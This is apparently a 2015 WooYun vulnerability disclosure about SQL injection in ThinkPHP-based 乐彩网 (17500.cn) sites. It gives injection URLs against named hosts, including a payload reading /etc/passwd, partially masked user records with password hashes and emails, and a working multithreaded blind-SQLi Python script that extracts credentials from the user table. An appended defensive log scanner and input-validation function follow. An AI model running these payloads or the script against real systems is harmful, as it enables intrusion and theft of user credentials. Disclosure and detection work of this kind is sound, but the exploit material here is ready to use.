
乐彩网 (17500.cn) SQL injection vulnerability (core DB with over a million user records / a ThinkPHP case)

2015-06-28 05:45

Several 乐彩网 sites are built on the ThinkPHP framework. Because the patch was never applied, they are all exposed to the framework-wide injection described in WooYun: ThinkPHP框架架构上存在SQL注入 (SQL injection in the ThinkPHP framework architecture).



Injection 1:

http://lebi.17500.cn/Experts/Search/index/lotid/3d.html?ename[0]=exp&ename[1]=and(select(0)from(select/**/sleep(1))v)



The corresponding development/test site:

http://devlebi.17500.cn/Experts/Search/index/lotid/3d.html?ename[0]=exp&ename[1]=and%20updatexml(1,concat(0x7c,user(),0x7c,version()),1)



(screenshot: devlebi.png)



load_file:

http://devlebi.17500.cn/Experts/Search/index/lotid/3d.html?ename[0]=exp&ename[1]=and%20updatexml(1,concat(0x7c,load_file(%27/etc/passwd%27)),1)

(screenshot: lebi2.png)



Injection 2: the passport site

https://passport.17500.cn/message/system/sitefrom/1.html?isread[0]=exp&isread[1]=and%200%20or%201%20limit%2023%23

https://passport.17500.cn/message/system.html?msgid=56





And there are many more...

Proof of vulnerability:

User data, 1.2 million rows:

select(count(*))from uc.uc_members: 1229581



(screenshot: count.png)



select(group_concat(uid,0x3a,username,0x3a,password,0x3a,email,0x7c))from uc.uc_members where uid in(2,4):

eren:d6694**************39c9f06742cc8:[email protected] :134424

小卒:e1cac8ddd3**************33aa15f:[email protected] :907316



(screenshot: bb.png)





Test script (replace the cookie in the script with your own session cookie):

#coding=utf-8

'''databases: information_schema,bbslog,cnlot2004,lottery,mysql,newlebi,performance_schema,test,uc,ucbak,uprofile'''

import sys,urllib2
import threading
from multiprocessing.dummy import Pool
from multiprocessing.dummy import Lock
from optparse import OptionParser
from urllib2 import Request,urlopen,URLError,HTTPError
import urllib


def request(URL):
    # Fetch a URL with a browser-like User-Agent and the logged-in session cookie.
    user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }
    req = urllib2.Request(URL, None, user_agent)
    req.add_header('Cookie', 'PHPSESSID=7dsnoj0rejlv4m9dg90ures6j1')  # cookie of a logged-in session
    try:
        request = urllib2.urlopen(req)
    except Exception:
        return ''
    return request.read()


def binary_sqli(left, right, index):
    # Boolean-based binary search for the character at position `index`;
    # `verify` is a string that only appears in the page when the condition holds.
    global result
    while 1:
        mid = (left + right)/2
        if mid == left:
            lock.acquire()
            result[index-1]= chr(mid)
            sys.stdout.write('\r%s' % 'data: '+''.join(result).strip('*'))
            sys.stdout.flush()
            lock.release()
            break
        payload = "(ascii(substring((select(group_concat(uid,0x3a,username,0x3a,password,0x3a,email,0x7c))from uc.uc_members where uid in(2,4)),%s,1))%%%s=ascii(substring((select(group_concat(uid,0x3a,username,0x3a,password,0x3a,email,0x7c))from uc.uc_members where uid in(2,4)),%s,1)))limit 2#" % (index, mid, index)
        html = request('https://passport.17500.cn/message/system/sitefrom/1.html?isread[0]=exp&isread[1]==-1+or'+urllib.quote(payload))
        verify = '2015-03-17 01:57:21'
        if verify in html:
            right = mid
        else:
            left = mid


def multi_run_wrapper(args):
    return binary_sqli(*args)


if __name__ == '__main__':
    # One worker per character position, 10 positions in flight at a time.
    result=list('*'*100)
    lock=Lock()
    args = []
    for i in range(1,100):
        args.append((32, 127, i))
    pool = Pool(10)
    out = pool.map(multi_run_wrapper, args)
    pool.close()
    pool.join()
    output = open('result.txt', 'w')
    output.write(''.join(result))
    output.close()

Fix:

Upgrade ThinkPHP.

Put a decent WAF in front of the sites.
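The root cause in every request above is the same: a parameter the handler expects as one string arrives as a two-element array, and ThinkPHP's where() treats that array as an operator (exp) followed by a raw SQL expression. The following Python 3 script is an added illustration, not code from the report or from ThinkPHP, of the two things a defender can do with that fact: scan access-log lines for the name[0]=exp request shape (plus the sleep/updatexml/load_file markers used in the payloads above) so the pattern can be alerted on while the upgrade is pending, and apply the input-handling rule that removes the bug class, refusing array-shaped input wherever a single value is expected. The log lines are constructed; their paths mirror the report's URLs, and the client addresses, timestamps and sizes are made up. The function names (find_exp_injections, scalar_param, split_query) are this example's own.

```python
"""Added defender-side example (not from the report, not ThinkPHP code).

Two pieces:
  * find_exp_injections(): scan access-log lines for the ThinkPHP
    'param[0]=exp&param[1]=<sql>' request shape seen in the report.
  * scalar_param(): the input-handling rule that removes the bug class,
    refusing array-shaped input where the handler expects a single value.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (combined-log shape). The paths and
# query strings mirror the requests in the report; client addresses,
# timestamps and byte counts are made up.
SAMPLE_LOG = """\
203.0.113.10 - - [28/Jun/2015:05:40:01 +0800] "GET /Experts/Search/index/lotid/3d.html?ename=zhangsan HTTP/1.1" 200 5120
203.0.113.10 - - [28/Jun/2015:05:40:07 +0800] "GET /Experts/Search/index/lotid/3d.html?ename[0]=exp&ename[1]=and(select(0)from(select/**/sleep(1))v) HTTP/1.1" 200 5120
203.0.113.11 - - [28/Jun/2015:05:41:13 +0800] "GET /message/system/sitefrom/1.html?isread[0]=exp&isread[1]=and%200%20or%201%20limit%2023%23 HTTP/1.1" 200 2048
203.0.113.12 - - [28/Jun/2015:05:42:50 +0800] "GET /message/system.html?msgid=56 HTTP/1.1" 200 2048
203.0.113.13 - - [28/Jun/2015:05:43:02 +0800] "GET /Experts/Search/index/lotid/3d.html?ename%5B0%5D=exp&ename%5B1%5D=and%20updatexml(1,concat(0x7c,load_file(%27/etc/passwd%27)),1) HTTP/1.1" 500 312
"""

# Request line of a combined-log entry: client address and request target.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"')
# PHP array-style parameter name: name[0], name[1] or name[] (auto-index).
ARRAY_KEY_RE = re.compile(r'^(?P<name>[^\[\]]+)\[(?P<idx>\d*)\]$')
# Secondary indicators: the MySQL functions used in the report's payloads.
SQL_MARKERS = ('sleep(', 'updatexml(', 'extractvalue(', 'load_file(')


def split_query(target):
    """Split a request target's query into PHP-style arrays and plain scalars.

    'ename[0]=exp&ename[1]=x&msgid=56' ->
        ({'ename': {0: 'exp', 1: 'x'}}, {'msgid': '56'})
    parse_qsl percent-decodes keys, so 'ename%5B0%5D' is handled as well.
    """
    arrays, scalars = {}, {}
    for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        m = ARRAY_KEY_RE.match(key)
        if not m:
            scalars[key] = value
            continue
        bucket = arrays.setdefault(m.group('name'), {})
        idx = int(m.group('idx')) if m.group('idx') else len(bucket)
        bucket[idx] = value
    return arrays, scalars


def find_exp_injections(log_text):
    """Return one finding per request whose array parameter has 'exp' at index 0.

    That shape is what ThinkPHP's where() interprets as [operator, raw SQL
    expression] when the array is passed straight through from the request.
    """
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        arrays, _ = split_query(m.group('target'))
        for name, parts in arrays.items():
            if parts.get(0, '').strip().lower() != 'exp':
                continue
            expr = parts.get(1, '')
            findings.append({
                'ip': m.group('ip'),
                'param': name,
                'expression': expr,
                'markers': [mk for mk in SQL_MARKERS if mk in expr.lower()],
            })
    return findings


class UnexpectedArrayInput(ValueError):
    """Raised when a parameter that must be a scalar arrives as an array."""


def scalar_param(target, name, default=None):
    """Fetch a query parameter as a single string, refusing array input.

    Mitigation side of the same bug: a handler that feeds request data into
    a query condition must never accept name[0]/name[1] for a value it
    expects as one string. Arrays are rejected rather than flattened, so the
    [operator, expression] form can never reach the query builder.
    """
    arrays, scalars = split_query(target)
    if name in arrays:
        raise UnexpectedArrayInput('%s must be a single value, got %d array elements'
                                   % (name, len(arrays[name])))
    return scalars.get(name, default)


if __name__ == '__main__':
    for f in find_exp_injections(SAMPLE_LOG):
        print('%s  param=%s  markers=%s'
              % (f['ip'], f['param'], ','.join(f['markers']) or '-'))
    print(scalar_param('/message/system.html?msgid=56', 'msgid'))
```

The scanner keys on the request shape rather than on specific SQL keywords, because the report's own payloads show that the expression part varies freely (a timing probe, an updatexml error probe, a plain boolean with limit); the markers list is only there to rank findings. The scalar_param rule is the framework-independent version of the fix: once array input is refused for scalar parameters, the exp operator can no longer be selected from the outside, whatever the ORM does with it.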

Source: www.wooyun.org/bugs/wooyun-2015-0113949
